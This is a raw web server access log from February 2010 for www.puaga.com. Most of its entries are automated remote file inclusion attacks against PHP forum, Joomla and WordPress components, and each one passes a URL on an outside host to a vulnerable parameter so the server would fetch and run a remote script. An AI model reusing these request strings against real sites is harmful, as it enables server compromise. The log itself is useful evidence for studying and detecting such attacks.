65.60.10.18 - - [25/Feb/2010:09:36:36 -0800] "GET /admin/include/lib.module.php?mod_root=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:09:36:36 -0800] "GET /logs/access_100131.log//admin/include/lib.module.php?mod_root=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:09:36:37 -0800] "GET /logs//admin/include/lib.module.php?mod_root=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:09:36:37 -0800] "GET /admin/include/lib.module.php?mod_root=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:09:36:38 -0800] "GET /logs/access_100131.log//admin/include/lib.module.php?mod_root=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:09:36:45 -0800] "GET /logs/access_100131.log//admin/include/lib.module.php?mod_root=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:09:36:45 -0800] "GET /logs//admin/include/lib.module.php?mod_root=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:09:36:46 -0800] "GET /admin/include/lib.module.php?mod_root=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [25/Feb/2010:09:36:56 -0800] "GET /logs/access_100119.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [25/Feb/2010:09:36:56 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt??? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [25/Feb/2010:09:36:57 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
61.47.7.71 - - [25/Feb/2010:09:38:00 -0800] "GET /logs/access_100125.log//delete_comment.php?board_skin_path=http://www.kamawilson.com/id1.jpg? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.47.7.71 - - [25/Feb/2010:09:38:00 -0800] "GET /delete_comment.php?board_skin_path=http://www.kamawilson.com/id1.jpg? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.47.7.71 - - [25/Feb/2010:09:38:00 -0800] "GET /logs//delete_comment.php?board_skin_path=http://www.kamawilson.com/id1.jpg? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:09:38:10 -0800] "GET /logs/access_100203.log%20%20////write_comment_update.php?board_skin_path=http://www.4bwd.com//images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:09:38:10 -0800] "GET ///write_comment_update.php?board_skin_path=http://www.4bwd.com//images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:09:38:10 -0800] "GET /logs////write_comment_update.php?board_skin_path=http://www.4bwd.com//images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.154 - - [25/Feb/2010:09:38:18 -0800] "GET /logs/accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.154 - - [25/Feb/2010:09:38:18 -0800] "GET /logs/access_100128.log%20%20/accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.154 - - [25/Feb/2010:09:38:18 -0800] "GET /accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.19.157.37 - - [25/Feb/2010:09:38:27 -0800] "GET /logs/accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.gzzsyy.com.cn/brd/gid.gif???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
61.19.157.37 - - [25/Feb/2010:09:38:27 -0800] "GET /logs/access_100128.log%20/accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.gzzsyy.com.cn/brd/gid.gif???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
61.19.157.37 - - [25/Feb/2010:09:38:28 -0800] "GET /accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.gzzsyy.com.cn/brd/gid.gif???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
79.40.34.119 - - [25/Feb/2010:09:38:41 -0800] "GET /logs/access_100129.log//include.php?path[docroot]=http://jonervdd.webs.com/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [25/Feb/2010:09:39:25 -0800] "GET /bbs//delete_all.php?board_skin_path=http://www.thaz.de//jackz/AinuLid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [25/Feb/2010:09:39:25 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://www.thaz.de//jackz/AinuLid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [25/Feb/2010:09:39:25 -0800] "GET /logs/access_100129.log//bbs//delete_all.php?board_skin_path=http://www.thaz.de//jackz/AinuLid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:09:39:31 -0800] "GET /logs////write_comment_update.php?board_skin_path=http://www.4bwd.com//images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:09:39:31 -0800] "GET ///write_comment_update.php?board_skin_path=http://www.4bwd.com//images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:09:39:31 -0800] "GET /logs/access_100203.log%20%20////write_comment_update.php?board_skin_path=http://www.4bwd.com//images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:09:40:04 -0800] "GET /logs/access_100203.log%20%20////delete_all.php?board_skin_path=http://kmgtusa.com/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:09:40:04 -0800] "GET /logs////delete_all.php?board_skin_path=http://kmgtusa.com/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:09:40:04 -0800] "GET ///delete_all.php?board_skin_path=http://kmgtusa.com/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.154 - - [25/Feb/2010:09:40:10 -0800] "GET /logs//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.154 - - [25/Feb/2010:09:40:10 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.154 - - [25/Feb/2010:09:40:10 -0800] "GET /logs/access_100214.log%20%20//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.47.7.71 - - [25/Feb/2010:09:40:25 -0800] "GET /logs/access_100128.log//delete_comment.php?board_skin_path=http://www.kamawilson.com/id1.jpg? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.188.102.171 - - [25/Feb/2010:09:41:41 -0800] "GET /pack/applist.txt HTTP/1.1" 206 198 "-" "Microsoft URL Control - 6.00.8169" "simple.puaga.com"
78.188.102.171 - - [25/Feb/2010:09:41:42 -0800] "GET /pack//applications/grader/icon.gif HTTP/1.1" 206 5593 "-" "Microsoft URL Control - 6.00.8169" "simple.puaga.com"
78.188.102.171 - - [25/Feb/2010:09:41:45 -0800] "GET /pack//applications/planlayici/icon.gif HTTP/1.1" 206 8054 "-" "Microsoft URL Control - 6.00.8169" "simple.puaga.com"
212.241.177.123 - - [25/Feb/2010:09:41:51 -0800] "GET /logs/access_100202.log//bbs//delete_all.php?board_skin_path=http://www.thaz.de//jackz/AinuLid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.40.34.119 - - [25/Feb/2010:09:42:32 -0800] "GET /logs/access_100129.log%20%20//include.php?path[docroot]=http://jonervdd.webs.com/idxx.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [25/Feb/2010:09:43:14 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://kortech.cn/bbs/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [25/Feb/2010:09:43:15 -0800] "GET /logs/access_100119.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://kortech.cn/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [25/Feb/2010:09:43:15 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://kortech.cn/bbs/id1.txt? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.154 - - [25/Feb/2010:09:43:37 -0800] "GET /logs/access_100128.log/accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.154 - - [25/Feb/2010:09:44:38 -0800] "GET /logs/access_100201.log/accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.188.102.171 - - [25/Feb/2010:09:45:11 -0800] "GET /pack/applist.txt HTTP/1.1" 206 198 "-" "Microsoft URL Control - 6.00.8169" "simple.puaga.com"
78.188.102.171 - - [25/Feb/2010:09:45:12 -0800] "GET /pack//applications/grader/icon.gif HTTP/1.1" 206 5593 "-" "Microsoft URL Control - 6.00.8169" "simple.puaga.com"
78.188.102.171 - - [25/Feb/2010:09:45:13 -0800] "GET /pack//applications/planlayici/icon.gif HTTP/1.1" 206 8054 "-" "Microsoft URL Control - 6.00.8169" "simple.puaga.com"
65.60.10.18 - - [25/Feb/2010:09:45:28 -0800] "GET ///write_comment_update.php?board_skin_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:09:45:28 -0800] "GET /logs/access_100203.log%20%20////write_comment_update.php?board_skin_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:09:45:31 -0800] "GET /logs////write_comment_update.php?board_skin_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.188.102.171 - - [25/Feb/2010:09:45:33 -0800] "GET /pack/applist.txt HTTP/1.1" 206 198 "-" "Microsoft URL Control - 6.00.8169" "simple.puaga.com"
65.60.10.18 - - [25/Feb/2010:09:45:41 -0800] "GET /logs/access_100206.log%20%20////write_comment_update.php?board_skin_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:09:46:07 -0800] "GET ///write_comment_update.php?board_skin_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:09:46:07 -0800] "GET /logs/access_100203.log%20%20////write_comment_update.php?board_skin_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:09:46:07 -0800] "GET /logs////write_comment_update.php?board_skin_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.112.124 - - [25/Feb/2010:09:46:09 -0800] "GET / HTTP/1.0" 200 13498 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.atesh.info"
67.195.112.124 - - [25/Feb/2010:09:46:09 -0800] "GET /atesh_info/ai.css HTTP/1.0" 200 487 "http://www.atesh.info/" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.atesh.info"
78.188.102.171 - - [25/Feb/2010:09:46:16 -0800] "GET /pack/applist.txt HTTP/1.1" 206 198 "-" "Microsoft URL Control - 6.00.8169" "simple.puaga.com"
65.60.10.18 - - [25/Feb/2010:09:46:16 -0800] "GET ///write_comment_update.php?board_skin_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:09:46:16 -0800] "GET /logs/access_100203.log%20%20////write_comment_update.php?board_skin_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.188.102.171 - - [25/Feb/2010:09:46:17 -0800] "GET /pack//applications/grader/icon.gif HTTP/1.1" 206 5593 "-" "Microsoft URL Control - 6.00.8169" "simple.puaga.com"
65.60.10.18 - - [25/Feb/2010:09:46:17 -0800] "GET /logs////write_comment_update.php?board_skin_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.188.102.171 - - [25/Feb/2010:09:46:19 -0800] "GET /pack//applications/planlayici/icon.gif HTTP/1.1" 206 8054 "-" "Microsoft URL Control - 6.00.8169" "simple.puaga.com"
65.60.10.18 - - [25/Feb/2010:09:46:23 -0800] "GET /logs/access_100206.log%20%20////write_comment_update.php?board_skin_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:09:46:25 -0800] "GET ///delete_all.php?board_skin_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:09:46:25 -0800] "GET /logs////delete_all.php?board_skin_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:09:46:26 -0800] "GET /logs/access_100203.log%20%20////delete_all.php?board_skin_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:09:46:37 -0800] "GET /logs/access_100206.log%20%20////write_comment_update.php?board_skin_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:09:46:49 -0800] "GET /logs/access_100206.log%20%20////delete_all.php?board_skin_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:09:46:54 -0800] "GET /logs/access_100203.log%20%20////delete_all.php?board_skin_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:09:46:54 -0800] "GET ///delete_all.php?board_skin_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:09:46:54 -0800] "GET /logs////delete_all.php?board_skin_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.154 - - [25/Feb/2010:09:47:10 -0800] "GET /logs/access_100131.log/accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:09:47:14 -0800] "GET /logs/access_100206.log%20%20////delete_all.php?board_skin_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.127.209.105 - - [25/Feb/2010:09:47:17 -0800] "GET /functions_admin.php?phpbb_root_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.puaga.com"
210.127.209.105 - - [25/Feb/2010:09:47:17 -0800] "GET /logs/functions_admin.php?phpbb_root_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.puaga.com"
210.127.209.105 - - [25/Feb/2010:09:47:17 -0800] "GET /logs/access.log/functions_admin.php?phpbb_root_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:09:47:30 -0800] "GET /logs/access_100203.log%20%20////write_comment_update.php?board_skin_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:09:47:30 -0800] "GET ///write_comment_update.php?board_skin_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:09:47:30 -0800] "GET /logs////write_comment_update.php?board_skin_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:09:47:46 -0800] "GET /logs/access_100206.log%20%20////write_comment_update.php?board_skin_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:09:47:58 -0800] "GET //plugin/replace/plugin.php?PHORUM[settings_dir]=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:09:47:58 -0800] "GET /logs///plugin/replace/plugin.php?PHORUM[settings_dir]=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:09:47:58 -0800] "GET /logs/access_100119.log%20%20///plugin/replace/plugin.php?PHORUM[settings_dir]=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:09:48:05 -0800] "GET /logs/access.log//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:09:48:05 -0800] "GET /logs//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:09:48:06 -0800] "GET /index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
210.127.209.105 - - [25/Feb/2010:09:48:08 -0800] "GET /logs/access_100201.log/functions_admin.php?phpbb_root_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:09:48:11 -0800] "GET /logs/access.log//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:09:48:11 -0800] "GET /logs//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:09:48:12 -0800] "GET /index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
210.127.209.105 - - [25/Feb/2010:09:48:32 -0800] "GET /logs/access_100118.log/functions_admin.php?phpbb_root_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:09:49:27 -0800] "GET /logs/access_100203.log%20%20////delete_all.php?board_skin_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:09:49:27 -0800] "GET ///delete_all.php?board_skin_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:09:49:33 -0800] "GET /logs/access_100206.log%20%20////delete_all.php?board_skin_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.154 - - [25/Feb/2010:09:49:50 -0800] "GET /logs/access_100214.log//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:09:49:53 -0800] "GET ///write_comment_update.php?board_skin_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:09:49:53 -0800] "GET /logs////write_comment_update.php?board_skin_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:09:49:53 -0800] "GET /logs/access_100203.log%20%20////write_comment_update.php?board_skin_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:09:50:00 -0800] "GET /logs/access_100206.log%20%20////write_comment_update.php?board_skin_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [25/Feb/2010:09:50:02 -0800] "GET /logs/access_100125.log/co.uk/components/com_moofaq/includes/file_includer.=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [25/Feb/2010:09:50:20 -0800] "GET /logs/access_100121.log/co.uk/components/com_moofaq/includes/file_includer.=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.188.102.171 - - [25/Feb/2010:09:50:26 -0800] "GET /pack/applist.txt HTTP/1.1" 206 242 "-" "Microsoft URL Control - 6.00.8169" "simple.puaga.com"
65.60.10.18 - - [25/Feb/2010:09:50:27 -0800] "GET /logs/access_100206.log%20%20////write_comment_update.php?board_skin_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.188.102.171 - - [25/Feb/2010:09:50:27 -0800] "GET /pack//applications/grader/icon.gif HTTP/1.1" 206 5593 "-" "Microsoft URL Control - 6.00.8169" "simple.puaga.com"
78.188.102.171 - - [25/Feb/2010:09:50:29 -0800] "GET /pack//applications/planlayici/icon.gif HTTP/1.1" 206 8054 "-" "Microsoft URL Control - 6.00.8169" "simple.puaga.com"
78.188.102.171 - - [25/Feb/2010:09:50:31 -0800] "GET /pack//applications/writer/icon.gif HTTP/1.1" 206 5888 "-" "Microsoft URL Control - 6.00.8169" "simple.puaga.com"
200.226.134.154 - - [25/Feb/2010:09:52:53 -0800] "GET /logs/access_100124.log//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.54.154.10 - - [25/Feb/2010:09:53:22 -0800] "GET /logs/access_100217.log//include/prodler.class.php?sPath=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
200.54.154.10 - - [25/Feb/2010:09:53:22 -0800] "GET /include/prodler.class.php?sPath=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
200.54.154.10 - - [25/Feb/2010:09:53:23 -0800] "GET /logs//include/prodler.class.php?sPath=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
94.236.23.242 - - [25/Feb/2010:09:55:19 -0800] "GET /logs/access_100124.log//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
94.236.23.242 - - [25/Feb/2010:09:55:20 -0800] "GET /components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
94.236.23.242 - - [25/Feb/2010:09:55:20 -0800] "GET /logs//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:09:55:59 -0800] "GET /logs//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
